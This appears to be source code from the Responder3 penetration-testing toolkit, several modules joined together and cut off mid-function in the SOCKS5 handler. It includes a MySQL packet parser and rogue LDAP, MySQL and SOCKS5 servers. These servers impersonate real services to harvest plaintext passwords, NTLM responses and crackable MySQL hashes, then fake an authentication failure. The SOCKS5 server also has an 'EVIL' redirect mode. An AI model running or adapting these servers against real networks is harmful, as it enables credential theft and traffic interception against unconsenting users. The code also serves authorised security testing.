# https://dev.mysql.com/doc/internals/en/connection-phase.html
# https://dev.mysql.com/doc/internals/en/mysql-packet.html

"""
everyone has a price paid in fortune or freedom 
every single device a grenade for fortune or freedom 
"""

import io
import enum

from responder3.core.asyncio_helpers import *

def get_buffer_endpos(buff):
	pos = buff.tell()
	buff.seek(0, 2)
	pos_end = buff.tell()
	buff.seek(pos, 0)
	return pos_end

def read_cstring(buff):
	# TODO: make this better
	temp = b''
	end_pos = get_buffer_endpos(buff)
	while buff.tell() <= end_pos:
		c = buff.read(1)
		temp += c
		if c == b'\x00':
			break

	if temp[-1:] != b'\x00':
		return None
	return temp

class MYSQLSessionStatus(enum.Enum):
	INITIAL_HANDSHAKE = 0
	AUTHENTICATION_SWITCH = 1

class MYSQLAuthType(enum.Enum):
	PLAIN = 'PLAIN' # https://dev.mysql.com/doc/internals/en/clear-text-authentication.html
	OLD = 'OLD' # https://dev.mysql.com/doc/internals/en/old-password-authentication.html
	SECURE = 'SECURE' # https://dev.mysql.com/doc/internals/en/secure-password-authentication.html



class CapabilityFlags(enum.IntFlag):
	LONG_PASSWORD = 0x00000001
	FOUND_ROWS = 0x00000002
	LONG_FLAG = 0x00000004
	CONNECT_WITH_DB = 0x00000008
	NO_SCHEMA = 0x00000010
	COMPRESS = 0x00000020
	ODBC = 0x00000040
	LOCAL_FILES = 0x00000080
	IGNORE_SPACE = 0x00000100
	PROTOCOL_41 = 0x00000200 #CLIENT_CHANGE_USER
	INTERACTIVE = 0x00000400
	SSL = 0x00000800
	IGNORE_SIGPIPE = 0x00001000
	TRANSACTIONS = 0x00002000
	RESERVED = 0x00004000
	SECURE_CONNECTION = 0x00008000
	MULTI_STATEMENTS = 0x00010000
	MULTI_RESULTS = 0x00020000
	PS_MULTI_RESULTS = 0x00040000
	PLUGIN_AUTH = 0x00080000
	CONNECT_ATTRS = 0x00100000
	PLUGIN_AUTH_LENENC_CLIENT_DATA = 0x00200000
	CAN_HANDLE_EXPIRED_PASSWORDS = 0x00400000
	SESSION_TRACK = 0x00800000
	DEPRECATE_EOF = 0x01000000

class StatusFlags(enum.IntFlag):
	IN_TRANS = 0x0001    #a transaction is active
	AUTOCOMMIT = 0x0002  #auto-commit is enabled
	MORE_RESULTS_EXISTS = 0x0008 	 
	NO_GOOD_INDEX_USED = 0x0010 	 
	NO_INDEX_USED = 0x0020 	 
	CURSOR_EXISTS = 0x0040 #Used by Binary Protocol Resultset to signal that COM_STMT_FETCH must be used to fetch the row-data.
	LAST_ROW_SENT = 0x0080 	 
	DB_DROPPED = 0x0100 	 
	NO_BACKSLASH_ESCAPES = 0x0200 	 
	METADATA_CHANGED = 0x0400 	 
	QUERY_WAS_SLOW = 0x0800 	 
	PS_OUT_PARAMS = 0x1000 	 
	IN_TRANS_READONLY = 0x2000 #in a read-only transaction
	SESSION_STATE_CHANGED = 0x4000 #connection state information has changed

class CharacterSet(enum.Enum):
	big5_chinese_ci     =   1
	dec8_swedish_ci     =   3
	cp850_general_ci    =   4
	hp8_english_ci      =   6
	koi8r_general_ci    =   7
	latin1_swedish_ci   =   8
	latin2_general_ci   =   9
	swe7_swedish_ci     =  10
	ascii_general_ci    =  11
	ujis_japanese_ci    =  12
	sjis_japanese_ci    =  13
	hebrew_general_ci   =  16
	tis620_thai_ci      =  18
	euckr_korean_ci     =  19
	koi8u_general_ci    =  22
	gb2312_chinese_ci   =  24
	greek_general_ci    =  25
	cp1250_general_ci   =  26
	gbk_chinese_ci      =  28
	latin5_turkish_ci   =  30
	armscii8_general_ci =  32
	utf8_general_ci     =  33
	ucs2_general_ci     =  35
	cp866_general_ci    =  36
	keybcs2_general_ci  =  37
	macce_general_ci    =  38
	macroman_general_ci =  39
	cp852_general_ci    =  40
	latin7_general_ci   =  41
	cp1251_general_ci   =  51
	utf16_general_ci    =  54
	utf16le_general_ci  =  56
	cp1256_general_ci   =  57
	cp1257_general_ci   =  59
	utf32_general_ci    =  60
	binary              =  63
	geostd8_general_ci  =  92
	cp932_japanese_ci   =  95
	eucjpms_japanese_ci =  97
	gb18030_chinese_ci  = 248
	utf8mb4_0900_ai_ci  = 255

class HandshakeV10:
	def __init__(self):
		self.payload_length = None
		self.sequence_id = None
		self.protocol_version = 10
		self.server_version = None
		self.connection_id = None
		self.auth_plugin_data_part_1 = None
		self.filler = b'\x00'
		self.capability_flags = None
		self.character_set = None
		self.status_flags = None
		#self.capability_flags_2 = None
		#very optional XD
		self.length_of_auth_plugin_data = None
		self.reserved = b'\x00' * 10
		self.auth_plugin_data_part_2 = None
		self.auth_plugin_name = None

	@staticmethod
	def from_bytes(bbuff):
		return HandshakeV10.from_buffer(io.BytesIO(bbuff))

	# TODO: more processing of data
	@staticmethod
	def from_buffer(buff):
		resp = HandshakeV10() 
		resp.payload_length = int.from_bytes(buff.read(3),byteorder = 'little', signed = False)
		resp.sequence_id = int.from_bytes(buff.read(1),byteorder = 'little', signed = False)
		return resp

	def to_bytes(self):
		t = self.protocol_version.to_bytes(1, byteorder = 'little', signed = False)
		t += self.server_version.encode('ascii') + b'\x00'
		t += self.connection_id.to_bytes(4, byteorder = 'little', signed = False)
		t += self.auth_plugin_data_part_1.encode('ascii') + b'\x00'
		#t += self.filler
		flags = self.capability_flags.to_bytes(4, byteorder = 'little', signed = False)
		t += flags[:2]
		t += self.character_set.value.to_bytes(1, byteorder = 'little', signed = False)
		t += self.status_flags.to_bytes(2, byteorder = 'little', signed = False)
		t += flags[-2:]
		if self.capability_flags & CapabilityFlags.PLUGIN_AUTH:
			t += self.length_of_auth_plugin_data.to_bytes(1, byteorder = 'little', signed = False)
		else:
			t += b'\x00'
		t += self.reserved

		#if capability_flags & SECURE_CONNECTION:
		if self.auth_plugin_data_part_2:
			t += self.auth_plugin_data_part_2.encode() + b'\x00'

		if self.capability_flags & CapabilityFlags.PLUGIN_AUTH:
			t += self.auth_plugin_name.encode() + b'\x00'

		self.payload_length = len(t)
		t = self.sequence_id.to_bytes(1, byteorder = 'little', signed = False) + t
		t = self.payload_length.to_bytes(3, byteorder = 'little', signed = False)  + t
		return t

class HandshakeV10_New(HandshakeV10):
	def __init__(self, server_version, salt_1, salt_2, connection_id = 0, sequence_id = 0):
		HandshakeV10.__init__(self)
		self.sequence_id = sequence_id
		self.server_version = server_version
		self.connection_id = connection_id
		self.auth_plugin_data_part_1 = salt_1
		self.character_set = CharacterSet.utf8_general_ci
		self.status_flags = StatusFlags.AUTOCOMMIT
		self.auth_plugin_data_part_2 = salt_2

		#self.capability_flags = CapabilityFlags.RESERVED | CapabilityFlags.CONNECT_WITH_DB | \
		#	CapabilityFlags.LONG_PASSWORD | CapabilityFlags.PROTOCOL_41 | CapabilityFlags.LONG_FLAG | \
		#	CapabilityFlags.TRANSACTIONS | CapabilityFlags.SECURE_CONNECTION

		self.capability_flags =  CapabilityFlags.CONNECT_WITH_DB | \
			CapabilityFlags.PROTOCOL_41 | CapabilityFlags.LONG_FLAG | \
			CapabilityFlags.TRANSACTIONS


class HandshakeV10_Clear(HandshakeV10):
	def __init__(self, server_version, salt_1, connection_id = 0, sequence_id = 0):
		HandshakeV10.__init__(self)
		self.sequence_id = sequence_id
		self.server_version = server_version
		self.connection_id = connection_id
		self.auth_plugin_data_part_1 = salt_1
		self.character_set = CharacterSet.utf8_general_ci
		self.status_flags = StatusFlags.AUTOCOMMIT
		self.auth_plugin_data_part_2 = None
		self.auth_plugin_name = 'mysql_clear_password'
		self.length_of_auth_plugin_data = 0

		self.capability_flags =  CapabilityFlags.CONNECT_WITH_DB | \
			CapabilityFlags.PROTOCOL_41 | CapabilityFlags.LONG_FLAG | \
			CapabilityFlags.TRANSACTIONS | CapabilityFlags.PLUGIN_AUTH | CapabilityFlags.SECURE_CONNECTION


class HandshakeV9:
	def __init__(self):
		self.payload_length = None
		self.sequence_id = None
		self.protocol_version = 9
		self.server_version = None
		self.connection_id = None
		self.scramble = None

	def to_bytes(self):
		t = self.protocol_version.to_bytes(1, byteorder = 'little', signed = False)
		t += self.server_version.encode('ascii') + b'\x00'
		t += self.connection_id.to_bytes(4, byteorder = 'little', signed = False)
		t += self.scramble.encode('ascii') + b'\x00'

		self.payload_length = len(t)
		t = self.sequence_id.to_bytes(1, byteorder = 'little', signed = False) + t
		t = self.payload_length.to_bytes(3, byteorder = 'little', signed = False)  + t
		return t


class HandshakeResponse41:
	def __init__(self):
		self.payload_length = None
		self.sequence_id = None
		self.capability_flags = None
		self.max_packet_size = None
		self.character_set = None
		self.reserved = b'\x00' * 23
		self.username = None
		self.length_of_auth_response = None
		self.auth_response = None
		self.database = None
		self.auth_plugin_name = None
		self.length_of_all_key_values = None
		self.key_values = {}

	def to_bytes(self):
		t = self.capability_flags.to_bytes(4, byteorder = 'little', signed = False)
		t += self.max_packet_size.to_bytes(4, byteorder = 'little', signed = False)
		t += self.character_set.value.to_bytes(1, byteorder = 'little', signed = False)
		t += self.reserved
		t += self.username.encode('ascii') + b'\x00'
		
		if self.auth_response:
			t += self.length_of_auth_response.to_bytes(1, byteorder = 'little', signed = False)
			t += self.auth_response.encode() + b'\x00'
		else:
			t += b'\x00'
			t += self.auth_plugin_name.encode() + b'\x00'

		self.payload_length = len(t)
		t = self.sequence_id.to_bytes(1, byteorder = 'little', signed = False) + t
		t = self.payload_length.to_bytes(3, byteorder = 'little', signed = False)  + t
		return t

	@staticmethod
	def from_bytes(bbuff):
		return HandshakeResponse41.from_buffer(io.BytesIO(bbuff))

	# TODO: more processing of data
	@staticmethod
	def from_buffer(buff):
		resp = HandshakeResponse41()
		resp.payload_length = int.from_bytes(buff.read(3),byteorder = 'little', signed = False)
		resp.sequence_id = int.from_bytes(buff.read(1),byteorder = 'little', signed = False)
		resp.capability_flags = CapabilityFlags(int.from_bytes(buff.read(4),byteorder = 'little', signed = False))
		resp.max_packet_size = int.from_bytes(buff.read(4),byteorder = 'little', signed = False)
		resp.character_set = CharacterSet(int.from_bytes(buff.read(1),byteorder = 'little', signed = False))
		resp.reserved = buff.read(23)
		resp.username = read_cstring(buff).decode()
		resp.length_of_auth_response = int.from_bytes(buff.read(1),byteorder = 'little', signed = False)
		print(resp.length_of_auth_response)
		if resp.length_of_auth_response > 0:
			resp.auth_response = buff.read(resp.length_of_auth_response)

		# TODO: more processing of data
		resp.database = None
		resp.auth_plugin_name = None
		resp.length_of_all_key_values = None
		resp.key_values = {}

		return resp

class HandshakeResponse41_test(HandshakeResponse41):
	def __init__(self, sequence_id):
		HandshakeResponse41.__init__(self)
		self.sequence_id = sequence_id
		self.capability_flags = CapabilityFlags(0x01fea205)
		self.max_packet_size = 1073741824
		self.character_set = CharacterSet(255)
		self.username = 'admin'
		self.auth_plugin_name = 'mysql_clear_password'

class HandshakeResponse320:
	def __init__(self):
		self.payload_length = None
		self.sequence_id = None
		self.capability_flags = None
		self.max_packet_size = None
		self.username = None
		self.auth_response = None
		self.database = None

class SSLRequest:
	def __init__(self):
		self.payload_length = None
		self.sequence_id = None
		self.capability_flags = None
		self.max_packet_size = None
		self.character_set = None
		self.reserved = None

class AuthSwitchRequest:
	def __init__(self, sequence_id):
		self.payload_length = None
		self.sequence_id = sequence_id
		self.status = b'\xfe'
		self.plugin_name = None
		self.auth_plugin_data = None

	def to_bytes(self):
		t = self.status
		t += self.plugin_name.encode('ascii') + b'\x00'
		if self.auth_plugin_data:
			t += self.auth_plugin_data.encode('ascii')
		t += b'\x00'

		self.payload_length = len(t)
		t = self.sequence_id.to_bytes(1, byteorder = 'little', signed = False) + t
		t = self.payload_length.to_bytes(3, byteorder = 'little', signed = False)  + t
		return t

class AuthSwitchRequest_Clear(AuthSwitchRequest):
	def __init__(self, sequence_id):
		AuthSwitchRequest.__init__(self, sequence_id)
		self.payload_length = None
		self.status = b'\xfe'
		self.plugin_name = 'mysql_clear_password'
		self.auth_plugin_data = None

class AuthSwitchRequest_Old(AuthSwitchRequest):
	def __init__(self, sequence_id, salt):
		AuthSwitchRequest.__init__(self, sequence_id)
		self.payload_length = None
		self.status = b'\xfe'
		self.plugin_name = 'mysql_old_password'
		self.auth_plugin_data = salt


class OldAuthSwitchRequest:
	def __init__(self):
		self.payload_length = None
		self.sequence_id = sequence_id
		self.status = b'\xfe'

class AuthSwitchResponse:
	def __init__(self):
		self.payload_length = None
		self.sequence_id = None
		self.auth_plugin_data = None

	@staticmethod
	def from_bytes(bbuff):
		return AuthSwitchResponse.from_buffer(io.BytesIO(bbuff))

	# TODO: more processing of data
	@staticmethod
	def from_buffer(buff):
		resp = AuthSwitchResponse()
		resp.payload_length = int.from_bytes(buff.read(3),byteorder = 'little', signed = False)
		resp.sequence_id = int.from_bytes(buff.read(1),byteorder = 'little', signed = False)
		resp.auth_plugin_data = buff.read(-1)
		return resp


class MYSQLMessageParser:
	def __init__(self, mysql_session):
		self.session = mysql_session

	# https://dev.mysql.com/doc/internals/en/mysql-packet.html
	async def from_streamreader(self, reader):
		t_length = await readexactly_or_exc(reader, 3)
		length = int.from_bytes(t_length,byteorder = 'little', signed = False) + 1
		data = await readexactly_or_exc(reader, length)
		if self.session.status == MYSQLSessionStatus.INITIAL_HANDSHAKE:
			return HandshakeResponse41.from_bytes(t_length + data)
		elif self.session.status == MYSQLSessionStatus.AUTHENTICATION_SWITCH:
			return AuthSwitchResponse.from_bytes(t_length + data)
		else:
			return data


#!/usr/bin/env python3
#
# Author:
#  Tamas Jos (@skelsec)
#
# Module to grab LDAP credentials

import logging
import asyncio


from responder3.core.logging.logger import *
from responder3.core.asyncio_helpers import R3ConnectionClosed
from responder3.core.commons import *
from responder3.protocols.LDAP import *
from responder3.core.servertemplate import ResponderServer, ResponderServerSession
from responder3.protocols.authentication.NTLM import *

class LDAPSession(ResponderServerSession):
	def __init__(self, connection, log_queue):
		ResponderServerSession.__init__(self, connection, log_queue, self.__class__.__name__)
		self.auth_type = None
		self.auth_handler = None
		self.is_authed = False
		self.parser = LdapParser

	def __repr__(self):
		t  = '== LDAPSession ==\r\n'
		return t


class LDAP(ResponderServer):
	def init(self):
		self.parse_settings()
		
	def parse_settings(self):
		pass

	async def send_search_done(self, msg_id):
		t = {
			'resultCode' : 0, # succsess
			'matchedDN' : b'',
			'diagnosticMessage' : b'',
		}
		po = {'searchResDone' : SearchResultDone(t)}
		b= {
			'messageID' : msg_id,
			'protocolOp' : protocolOp(po),					
		}

		resp = LDAPMessage(b)
		self.cwriter.write(resp.dump())
		await self.cwriter.drain()


	async def send_search_result(self, msg_id, search_result_dict):
		po = {'searchResEntry' : SearchResultEntry(search_result_dict)}

		b= {
			'messageID' : msg_id,
			'protocolOp' : protocolOp(po),					
		}
		resp = LDAPMessage(b)
		self.cwriter.write(resp.dump())
		await self.cwriter.drain()

		await self.send_search_done(msg_id)
		

	async def send_capabilities(self, msg_id):
		x = [
				{
					'type' : b'supportedCapabilities',
					'attributes': [
						'1.2.840.113556.1.4.800'.encode(),
						'1.2.840.113556.1.4.1670'.encode(),
						'1.2.840.113556.1.4.1791'.encode(),
						'1.2.840.113556.1.4.1935'.encode(),
						'1.2.840.113556.1.4.1935'.encode(),
						'1.2.840.113556.1.4.2080'.encode(),
						'1.2.840.113556.1.4.2237'.encode(),
					],
				},
			]
		t = {
			'objectName' : b'', # invalidcredz
			'attributes' : PartialAttributeList(x),
		}
		await self.send_search_result(msg_id, t)

	async def send_sasl_mechanisms(self, msg_id):
		x = [
				{
					'type' : b'supportedSASLMechanisms',
					'attributes': [
						#'GSSAPI'.encode(),
						#'GSS-SPNEGO'.encode(),
						#'DIGEST-MD5'.encode(),
						#'EXTERNAL'.encode(),
						'NTLM'.encode(),
						],
				},
			]
		t = {
			'objectName' : b'', # invalidcredz
			'attributes' : PartialAttributeList(x),
		}
		await self.send_search_result(msg_id, t)		

	async def send_unauthorized_msg(self, msg_id):
		t = {
			'resultCode' : 49, # invalidcredz
			'matchedDN' : b'',
			'diagnosticMessage' : '8009030C: LdapErr: DSID-0C0906A1, comment: AcceptSecurityContext error, data 52e, v3839'.encode(),
		}
		po = {'bindResponse' : BindResponse(t)}
		b= {
			'messageID' : msg_id,
			'protocolOp' : protocolOp(po),					
		}
		resp = LDAPMessage(b)
		
		
		self.cwriter.write(resp.dump())
		await self.cwriter.drain()
		return

	@r3trafficlogexception
	async def run(self):
		while not self.shutdown_evt.is_set():
			try:
				result = await asyncio.gather(*[asyncio.wait_for(self.session.parser.from_streamreader(self.creader), timeout=None)], return_exceptions=True)
			except asyncio.CancelledError as e:
				raise e
			if isinstance(result[0], R3ConnectionClosed):
				return
			elif isinstance(result[0], Exception):
				raise result[0]
			else:
				msg = result[0]
					
			req = msg.native

			#### Currenly we only support bindrequest, but windows adexplorer for example polls the capabilities first
			#### That is not implement currently :(
			#### TODO! 
			#print(type(msg['protocolOp'].chosen))
			if not isinstance(msg['protocolOp'].chosen, BindRequest):
				if req['protocolOp']['attributes'][0] == b'supportedCapabilities':
					await self.send_capabilities(req['messageID'])
					continue

				elif req['protocolOp']['attributes'][0] == b'supportedSASLMechanisms':
					await self.send_sasl_mechanisms(req['messageID'])
					continue
			####
			
			if self.session.is_authed == False:
				
				msg_id = req['messageID']
				bindreq = msg['protocolOp'].chosen
				auth_data = req['protocolOp']['authentication']
				auth_type = bindreq['authentication'].chosen
											
				if not self.session.auth_type:
					if isinstance(auth_type, (SicilyPackageDiscovery, SicilyNegotiate)):
						self.session.auth_type = 'NTLM'
						self.auth_handler = NTLMAUTHHandler()
						self.auth_handler.setup()
						
					elif isinstance(auth_type, SaslCredentials):
						#extend here if you with to support other SASL types
						if auth_data['mechanism'] == b'PLAIN':
							username, password = auth_data['credentials'][1:].split(b'\x00')
							cred = Credential(
									credtype = 'SASL - PLAIN',
									username = username.decode(), 
									password = password.decode(),
									fullhash='%s:%s' % (username.decode(), password.decode())		
								)
							await self.logger.credential(cred)
							
						await self.send_unauthorized_msg(msg_id)
						return
							
					elif isinstance(auth_type, core.OctetString):
						cred = Credential(
									credtype = 'PLAIN',
									username = req['protocolOp']['name'].decode(), 
									password = req['protocolOp']['authentication'].decode(),
									fullhash='%s:%s' % (req['protocolOp']['name'].decode(), req['protocolOp']['authentication'].decode())		
								)
						await self.logger.credential(cred)
						await self.send_unauthorized_msg(msg_id)
						return
						
						
							
				if self.session.auth_type == 'NTLM':
					if isinstance(auth_type, SicilyPackageDiscovery):
						t = {
							'resultCode' : 0,
							'matchedDN' : 'NTLM'.encode(),
							'diagnosticMessage' : b'',
								
						}
						po = {'bindResponse' : BindResponse(t)}
						b= {
							'messageID' : msg_id,
							'protocolOp' : protocolOp(po),					
						}
						resp = LDAPMessage(b)
							
							
						self.cwriter.write(resp.dump())
						await self.cwriter.drain()
						continue
							
					elif isinstance(auth_type, SicilyNegotiate) and isinstance(self.auth_handler, NTLMAUTHHandler):
						status, challenge = self.auth_handler.do_auth(auth_data)
						t = {
							'resultCode' : 0,
							'matchedDN' : challenge,
							'diagnosticMessage' : b'',
							
						}
						po = {'bindResponse' : BindResponse(t)}
						b= {
							'messageID' : msg_id,
							'protocolOp' : protocolOp(po),					
						}
						resp = LDAPMessage(b)
							
							
						self.cwriter.write(resp.dump())
						await self.cwriter.drain()
						
					elif isinstance(auth_type, SicilyResponse) and isinstance(self.auth_handler, NTLMAUTHHandler):
						status, cred  = self.auth_handler.do_auth(auth_data)
						if cred:
							await self.logger.credential(cred.to_credential())
									
						await self.send_unauthorized_msg(msg_id)
						return
							
				else:
					raise Exception('Unknown auth type!')


import enum
import logging
import asyncio

from responder3.core.logging.logger import *
from responder3.core.asyncio_helpers import R3ConnectionClosed
from responder3.core.commons import *
from responder3.protocols.MYSQL import *
from responder3.core.servertemplate import ResponderServer, ResponderServerSession

class MYSQLSession(ResponderServerSession):
	def __init__(self, connection, log_queue):
		ResponderServerSession.__init__(self, connection, log_queue, self.__class__.__name__)
		self.parser = MYSQLMessageParser(self)
		self.status = MYSQLSessionStatus.INITIAL_HANDSHAKE
		self.server_version = None
		self.server_challenge = None #needs to be string of 20 characters!
		self.sequence_id = 0
		self.auth_type = None

		self.username = None

	def __repr__(self):
		t = '== MYSQL Session ==\r\n'
		t += 'status:      %s\r\n' % repr(self.status)
		return t


class MYSQL(ResponderServer):
	def init(self):
		if self.settings:
			self.parse_settings()
			return
		self.set_default_settings()

	def set_default_settings(self):
		self.session.server_version = '5.0.54'
		self.session.server_challenge = 'A'*20 #needs to be string of 20 characters!
		self.session.auth_type = MYSQLAuthType.SECURE #you may change it to PLAIN via settings, but newer versions of clients need explicit setting for plain auth to be enabled!

	def parse_settings(self):
		if 'server_version' in self.settings:
			self.session.server_version = self.settings['server_version']
		if 'server_challenge' in self.settings:
			self.session.server_challenge = self.settings['server_challenge']
		if 'auth_type' in self.settings:
			self.session.auth_type = MYSQLAuthType(self.settings['auth_type'].upper())

	async def send_data(self, data):
		self.cwriter.write(data)
		await self.cwriter.drain()

	@r3trafficlogexception
	async def run(self):
		# send protocolversion
		if self.session.auth_type == MYSQLAuthType.SECURE:
			handshake = HandshakeV10_New(self.session.server_version, self.session.server_challenge[:8], self.session.server_challenge[8:])
		elif self.session.auth_type == MYSQLAuthType.PLAIN or self.session.auth_type == MYSQLAuthType.OLD:
			handshake = HandshakeV10_Clear(self.session.server_version, self.session.server_challenge[:8])
		else:
			raise Exception('Auth type not implemented! TODO! %s' % self.auth_type.name)

		await asyncio.wait_for(
				self.send_data(handshake.to_bytes()), timeout=1)	
		self.session.sequence_id += 1	

		# main loop
		while not self.shutdown_evt.is_set():
			try:
				result = await asyncio.gather(*[asyncio.wait_for(self.session.parser.from_streamreader(self.creader), timeout=None)], return_exceptions=True)
			except asyncio.CancelledError as e:
				raise e
			if isinstance(result[0], R3ConnectionClosed):
				return
			elif isinstance(result[0], Exception):
				raise result[0]
			else:
				msg = result[0]

			self.session.sequence_id += 1

			if self.session.status == MYSQLSessionStatus.INITIAL_HANDSHAKE:

				if isinstance(msg, HandshakeResponse41):
					self.session.username = msg.username
					if self.session.auth_type == MYSQLAuthType.SECURE:
						fullhash = '$mysqlna$%s*%s' % (self.session.server_challenge.encode().hex(), msg.auth_response.hex())

						cred = Credential('MYSQL',
						  username=msg.username,
						  fullhash=fullhash
						)
						await self.logger.credential(cred)

						#TODO: implement error message
						return

					elif self.session.auth_type == MYSQLAuthType.PLAIN:
						switch = AuthSwitchRequest_Clear(self.session.sequence_id)
						self.session.status = MYSQLSessionStatus.AUTHENTICATION_SWITCH
						await self.send_data(switch.to_bytes())
						continue

					elif self.session.auth_type == MYSQLAuthType.OLD:
						switch = AuthSwitchRequest_Old(self.session.sequence_id, self.session.server_challenge[:8])
						self.session.status = MYSQLSessionStatus.AUTHENTICATION_SWITCH
						await self.send_data(switch.to_bytes())
						continue

					else:
						raise Exception('Auth type not implemented! TODO! %s' % self.auth_type.name)

					# $mysqlna$1c24ab8d0ee94d70ab1f2e814d8f0948a14d10b9*437e93572f18ae44d9e779160c2505271f85821d 

					#switch = AuthSwitchRequest_Clear(self.session.sequence_id)
					#await self.send_data(switch.to_bytes())
					#switch = HandshakeV10_New(self.session.sequence_id, self.session.server_challenge, '>612IWZ>fhWX')
					#await self.send_data(switch.to_bytes())
					#continue

				else:
					raise Exception('Unexpected packet!')

			elif self.session.status == MYSQLSessionStatus.AUTHENTICATION_SWITCH:

				if isinstance(msg, AuthSwitchResponse):
					if self.session.auth_type == MYSQLAuthType.PLAIN:
						cred = Credential('MYSQL-PLAIN',
						  username=self.session.username,
						  password=msg.auth_plugin_data.decode(),
						  fullhash='%s:%s' % (self.session.username, msg.auth_plugin_data.decode())
						)
						await self.logger.credential(cred)

						#TODO: implement error message
						return

					elif self.session.auth_type == MYSQLAuthType.OLD:
						cred = Credential('MYSQL-OLD',
						  username=self.session.username,
						  fullhash='%s:%s' % (self.session.username, msg.auth_plugin_data)
						)
						await self.logger.credential(cred)

						#TODO: implement error message
						return


				else:
					raise Exception('Unexpected packet!')



			
			


import logging
import asyncio

from responder3.core.logging.logger import *
from responder3.core.asyncio_helpers import R3ConnectionClosed
from responder3.core.commons import *
from responder3.protocols.SOCKS5 import *
from responder3.core.servertemplate import ResponderServer, ResponderServerSession

class SOCKS5Session(ResponderServerSession):
	def __init__(self, connection, log_queue):
		ResponderServerSession.__init__(self, connection, log_queue, self.__class__.__name__)
		self.current_state   = SOCKS5ServerState.NEGOTIATION
		self.allinterface = ipaddress.ip_address('0.0.0.0')
		self.supported_auth_types = None
		self.mutual_auth_type = None
		self.auth_handler    = None
		self.client_transport= None
		self.proxymode = None
		self.proxytable = None
		self.creds = None
		self.proxy_closed = asyncio.Event()
		self.timeout = None
		self.parser = SOCKS5CommandParser

	def __repr__(self):
		t  = '== SOCKS5Session ==\r\n'
		t += 'current_state:      %s\r\n' % repr(self.current_state)
		t += 'supported_auth_types: %s\r\n' % repr(self.supported_auth_types)
		t += 'mutual_auth_type: %s\r\n' % repr(self.mutual_auth_type)
		t += 'auth_handler: %s\r\n' % repr(self.auth_handler)
		t += 'client_transport: %s\r\n' % repr(self.client_transport)
		t += 'proxymode: %s\r\n' % repr(self.proxymode)
		t += 'proxytable: %s\r\n' % repr(self.proxytable)
		return t


class SOCKS5(ResponderServer):
	def init(self):
		self.parse_settings()
		
	def parse_settings(self):
		self.session.creds = None
		self.session.supported_auth_types = [SOCKS5Method.PLAIN]
		self.session.proxymode = SOCKS5ServerMode.OFF

		if self.settings is not None:
			if 'creds' in self.settings:
				self.session.creds = self.settings['creds']

			if 'authtype' in self.settings:
				self.session.supported_auth_types = []
				at = self.settings['authtype']
				if not isinstance(self.settings['authtype'], list):
					at = [self.settings['authtype']]

				for authtype in at:
					self.session.supported_auth_types.append(SOCKS5Method[authtype.upper()])

			if 'proxymode' in self.settings:
				self.session.proxymode = SOCKS5ServerMode[self.settings['proxymode'].upper()]

			if self.session.proxymode == SOCKS5ServerMode.EVIL:
				if 'proxytable' not in self.settings:
					raise Exception('EVIL mode requires proxyTable to be specified!')

				for entry in self.settings['proxytable']:
					for ip in entry:
						iprex = re.compile(ip)
						self.session.proxytable[iprex] = []
						for portranged in entry[ip]:
							for portrange in portranged:
								if portrange.find('-') != -1:
									start, stop = portrange.split('-')
									prange = range(int(start.strip()),int(stop.strip())+1)
							
								else:
									prange = range(int(portrange),int(portrange)+1)
								
								if portranged[portrange].find(':') != -1:
									# additional parsing to enable IPv6 addresses...
									marker = portranged[portrange].rfind(':')
									self.session.proxytable[iprex].append({prange: (portranged[portrange][:marker], int(portranged[portrange][marker+1:]))})
								else:
									raise Exception('The target address MUST be supplied in IP:PORT format! Problem: %s' % portranged[portrange])

	def fake_dest_lookup(self, dest_ip, dest_port):
		for ipregx in self.session.proxytable:
			if ipregx.match(dest_ip):
				for portranged in self.session.proxytable[ipregx]:
					for portrange in portranged:
						if dest_port in portrange:
							return portranged[portrange]

		return None, None

	async def send_data(self, data):
		self.cwriter.write(data)
		await self.cwriter.drain()

	async def modify_data(self, data):
		return data

	async def generic_read(self, reader):
		return reader.read(1024)

	async def proxy_forwarder(self, reader, writer, laddr, raddr):
		while not self.session.proxy_closed.is_set():
			try:
				data = await asyncio.wait_for(self.generic_read(reader), timeout=self.session.timeout)
			except asyncio.TimeoutError:
				await self.log('Timeout!', logging.DEBUG)
				self.session.proxy_closed.set()
				break	
			
			if data == b'' or reader.at_eof():
				print('Connection closed!')
				self.session.proxy_closed.set()
				break
			

			await self.logger.proxy('original data: %s' % data.hex(), laddr, raddr)
			await self.logger.proxydata(data, laddr, raddr, False, ProxyDataType.BINARY)
			modified_data = await self.modify_data(data)
			if modified_data != data:
				await self.log_proxy('modified data: %s' % repr(modified_data),laddr, raddr)
			
			try:
				writer.write(modified_data)
				await asyncio.wait_for(writer.drain(), timeout=self.session.timeout)
			except asyncio.TimeoutError:
				await self.log('Timeout!', logging.DEBUG)
				self.session.proxy_closed.set()
				break

		return

	@r3trafficlogexception
	async def run(self):
		while not self.shutdown_evt.is_set():
			try:
				result = await asyncio.gather(*[asyncio.wait_for(self.session.parser.from_streamreader(self.creader, self.session), timeout=None)], return_exceptions=True)
			except asyncio.CancelledError as e:
				raise e
			if isinstance(result[0], R3ConnectionClosed):
				return
			elif isinstance(result[0], Exception):
				raise result[0]
			else:
				msg = result[0]
					
			if self.session.current_state == SOCKS5ServerState.NEGOTIATION:
				mutual, mutual_idx = get_mutual_preference(self.session.supported_auth_types,msg.METHODS)
				if mutual is None:
					await self.logger.debug('No common authentication types! Client supports %s' % (','.join([str(x) for x in msg.METHODS])))
					t = await asyncio.wait_for(self.send_data(SOCKS5NegoReply.construct_auth(SOCKS5Method.NOTACCEPTABLE).to_bytes()), timeout = 1)
					return
				await self.logger.debug('Mutual authentication type: %s' % mutual)
				self.session.mutual_auth_type = mutual
				self.session.authHandler = SOCKS5AuthHandler(self.session.mutual_auth_type, self.session.creds) 

				if self.session.mutual_auth_type == SOCKS5Method.NOAUTH:
					self.session.current_state = SOCKS5ServerState.REQUEST # if no authentication is requred then we skip the auth part
				else:
					self.session.current_state = SOCKS5ServerState.NOT_AUTHENTICATED

				t = await asyncio.wait_for(self.send_data(SOCKS5NegoReply.construct(self.session.mutual_auth_type).to_bytes()), timeout = 1)

			elif self.session.current_state == SOCKS5ServerState.NOT_AUTHENTICATED:
				if self.session.mutual_auth_type == SOCKS5Method.PLAIN:
					status, creds = self.session.authHandler.do_AUTH(msg)
					await self.logger.credential(creds.to_credential())
					if status:
						self.session.current_state = SOCKS5ServerState.REQUEST
						t = await asyncio.wait_for(self.send_data(SOCKS5NegoReply.construct_auth(SOCKS5Method.NOAUTH).to_bytes()), timeout = 1)
					else:
						t = await asyncio.wait_for(self.send_data(SOCKS5NegoReply.construct_auth(SOCKS5Method.NOTACCEPTABLE).to_bytes()), timeout = 1)
						return
				else:
